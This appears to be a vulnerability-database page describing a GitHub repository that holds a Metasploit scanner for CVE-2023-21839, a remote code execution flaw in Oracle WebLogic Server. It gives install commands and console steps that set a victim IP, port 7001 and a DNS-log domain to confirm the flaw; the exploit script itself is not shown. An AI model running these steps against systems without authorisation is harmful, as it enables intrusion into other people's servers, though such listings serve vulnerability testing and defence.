CVE-2023-21839 PoC — Oracle WebLogic Server 安全漏洞

Source

Associated Vulnerability

Readme

# CVE-2023-21839-metasploit-scanner
## Usage
`git clone https://github.com/kurehalin/CVE-2023-21839-metasploit-scanner`  
`cd CVE-2023-21839-metasploit-scanner`  
`mkdir -p ~/.msf4/modules/auxiliary/scanner/http`  
`cp weblogic_iiop_rce.py ~/.msf4/modules/auxiliary/scanner/http`  
`chmod +x ~/.msf4/modules/auxiliary/scanner/http/weblogic_iiop_rce.py`  
`msfconsole`  
## POC usage
`use auxiliary/scanner/http/weblogic_iiop_rce`  
`set rhost <victim ip>`  
`set rport 7001`  
`set verify_dns_log <your specific dnslog domain>`  
`run`  
## result
![result 1](result1.png)
![result 2](result2.png)
## reference
* https://github.com/4ra1n/CVE-2023-21839  
* https://github.com/houqe/POC_CVE-2023-21839  

File Snapshot

 [4.0K]  /data/pocs/1ee62ab86da70a8d92705d434eec99853365171c
├── [ 703]  README.md
├── [174K]  result1.png
├── [ 27K]  result2.png
└── [ 11K]  weblogic_iiop_rce.py

0 directories, 4 files

Remarks